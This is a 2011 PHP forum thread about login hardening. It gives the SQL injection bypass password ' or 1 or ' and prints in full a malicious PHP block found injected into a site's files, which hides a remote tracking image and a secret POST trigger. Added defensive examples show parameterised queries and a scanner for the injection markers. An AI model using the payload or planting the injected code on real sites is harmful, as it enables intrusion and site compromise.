Phaėton
« on: June 12, 2011, 11:11:49 AM »
Them: What have you done thus far? (notice the arrogant extra question marks) Me (under breath): Well, mostly just report to bi-hourly status updates to a force of distraction from you clods, much worse than a newborn puppy. Me (above breath): I have a bug I'm trying to track down. Them: Can you post to the site what you have done so I can see your progress? (me:)
When I was your age we used to walk to the TV to change the channel.... _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
perkiset
« Reply #2 on: June 12, 2011, 11:57:02 AM »
(me, looking at Phaėton's code): unless that's proto code you might want to do a little more cleansing, because there look to be several vectors left open in there ...
It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
« Reply #3 on: June 12, 2011, 12:21:01 PM »
Do tell, perkiset?
btw I fixed that error for them and now I'm dealing with this one:
we've got fatal errors on line 10692 and more time to not answer questions.. (lol)
but I just did a bunch of code pasted together in random order... were you talking about the passwordsubmitted / ghetto login stuff? 'cause that actually is something else I'm dicking with .... do tell... vectors?
perkiset
« Reply #4 on: June 12, 2011, 03:12:02 PM »
submit a password of ' or 1 or '
(with apostrophes)
many ways to maneuver that one, make sure that there's no way people can send you controlling characters.
try $_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);
that's a quick and dirty squasher that will make sure that nothing except characters you expect comes through fields like that.
For numerics, my personal favorite is
$_POST['numVal'] = $_POST['numVal'] - 0;
Phaėton
« Reply #5 on: June 12, 2011, 04:35:39 PM »
> submit a password of ' or 1 or '
> (with apostrophes)
> many ways to maneuver that one, make sure that there's no way people can send you controlling characters.
> try $_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);
> that's a quick and dirty squasher that will make sure that nothing except characters you expect come though fields like that.
> For numerics, my personal favorite is
> $_POST['numVal'] = $_POST['numVal'] - 0;
I'm guessing you pass the whole $_POST off for cleaning to a routine! I like the 'numval-0', very nice! So let's say I just leave it without stripping all but allowable characters.. what could someone do by sending me control characters? Send like a '; eval('file_get_contents('worlddom.php'); as a post var? Or something like that?
perkiset
« Reply #6 on: June 12, 2011, 11:42:18 PM »
That would represent a larger hole and I've not toyed with that. I was targeting DB injections actually. Yes, I often set up a cleansing routine if I have a lot of input I need from the user. I'll often cleanse it in JS first, then look for dodgy chars. If they are there, then I am 100% certain that the post was programmatically sent and most likely by one of my, ahem, buddies here. I'd rather put the normal work of char cleansing out at the client so I don't even need to burden my servers with it. But I double up when it's arrived anyway. BTW real geeks would've said $_POST['numVal'] -= 0; because it compiles tighter. I remember that syntax when working real arithmetic, but just always seem to forget it in simple cleansers.
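The login check the two of them are circling in Reply #4 and Reply #6, written out as an added example (not code from the thread): the string-built query that the ' or 1 or ' password breaks, the whitelist squash from Reply #4, and the fix that actually closes the DB injection, a bound parameter plus a hash compare. Table and column names (users, username, password_hash) are assumed.

```php
<?php
// Added example, not from the thread. Table/column names are assumed.
declare(strict_types=1);

// The whitelist squash from Reply #4: keep only [A-Za-z0-9-_.], drop the rest.
function squash(string $value): string
{
    return preg_replace('/[^A-Z0-9\-_\.]/i', '', $value) ?? '';
}

// Numeric cleanse: validate instead of coercing. On PHP 8 a non-numeric
// string in arithmetic ("abc" - 0) throws a TypeError rather than yielding 0.
function cleanInt(string $value): ?int
{
    $n = filter_var($value, FILTER_VALIDATE_INT);
    return $n === false ? null : $n;
}

// VULNERABLE: query assembled from raw input. With the password "' or 1 or '"
// the WHERE clause becomes  password='' or 1 or ''  which is always true, so
// the first matching row comes back regardless of credentials.
function buildVulnerableQuery(string $user, string $pass): string
{
    return "SELECT id FROM users WHERE username='$user' AND password='$pass'";
}

// HARDENED: the squash on the username is defence in depth; the bound
// parameter is what stops the injection. The password is never put into SQL
// at all (squashing it, as Reply #4 does, would mangle legitimate passwords).
function checkLogin(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([squash($user)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Demo on constructed input; no database is needed for these three lines.
$payload = "' or 1 or '";
echo buildVulnerableQuery('bob', $payload), "\n"; // shows the always-true WHERE clause
echo squash($payload), "\n";                       // "or1or": quotes and spaces gone
var_dump(cleanInt('42'), cleanInt('42abc'));       // int(42), NULL
```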
Phaėton
« Reply #7 on: June 29, 2011, 12:59:25 PM »
Oh, so that's what probably happened here, where someone put this crap in every PHP file, even my backups:
<?php //{{126104ed
GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); }
function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; $i < $length; $i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String, 0x1505, 0x21); $Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2; $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2); }
function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ; $length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) { $Re = $HashStr{$i}; if (1 === ($Flag % 2)) { $Re += $Re; $Re = (int)($Re / 10) + ($Re % 10); } $CheckByte += $Re; $Flag ++; }
$CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 - $CheckByte; if (1 === ($Flag % 2) ) { if (1 === ($CheckByte % 2)) { $CheckByte += 9; } $CheckByte >>= 1; } }
return '7'.$CheckByte.$HashStr; }
function getpr($url) { $ch = CheckHash(HashURL($url)); $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "Rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } }
if(isset($_POST['xxxprch'])) { echo getpr($_POST['xxxprch']); exit(); } else ob_start('outputxxx_callback');
error_reporting($olderrxxx); }
//}}861921ab
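A way to find every copy of the block Phaėton pasted above, as an added example (not the thread's code): it walks a web root and flags PHP files carrying the markers that block leaves behind, the //{{ and //}} comment fences, the $alreadyxxx guard, the ob_start('outputxxx_callback') hook and the $_POST['xxxprch'] trigger. The default web root path is an assumption; pass your own as the first argument, and include backup directories since those were hit too.

```php
<?php
// Added example, not from the thread. Default scan root is an assumption.
declare(strict_types=1);

// Each marker is a distinctive fragment of the injected block quoted in the thread.
const INJECT_MARKERS = [
    'comment fence' => '~//(\{\{|\}\})[0-9a-f]{8}~',
    'global guard'  => '~GLOBAL\s+\$alreadyxxx~i',
    'output hook'   => '~ob_start\(\s*[\'"]outputxxx_callback[\'"]\s*\)~',
    'POST trigger'  => '~\$_POST\[[\'"]xxxprch[\'"]\]~',
];

// Returns [ path => [ ['line' => n, 'marker' => name], ... ] ] for files with a hit.
function scanForInjection(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        foreach (file($path, FILE_IGNORE_NEW_LINES) ?: [] as $n => $line) {
            foreach (INJECT_MARKERS as $name => $re) {
                if (preg_match($re, $line)) {
                    $hits[$path][] = ['line' => $n + 1, 'marker' => $name];
                }
            }
        }
    }
    return $hits;
}

// Report: one block per infected file, one line per marker found.
foreach (scanForInjection($argv[1] ?? '/var/www/html') as $path => $marks) {
    echo $path, "\n";
    foreach ($marks as $m) {
        printf("  line %d: %s\n", $m['line'], $m['marker']);
    }
}
```

A single marker hit is enough to warrant a look; all four on one line pair is the block as quoted. Treat a clean scan of the live tree as incomplete until the backups are scanned too, otherwise a restore reinfects the site.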
nutballs
« Reply #8 on: June 29, 2011, 03:53:23 PM »
Err, wtf is >>=? I must really be stuck in verbosity land.
I could eat a bowl of Alphabet Soup and shit a better argument than that.
perkiset
« Reply #9 on: June 29, 2011, 11:23:00 PM »
Bitwise shift right + the PHP assign-to operator.
Much like +=, but >>= is shift-equals.
nutballs
« Reply #10 on: June 30, 2011, 07:32:36 AM »
Oh yea. That ancient mystery of code.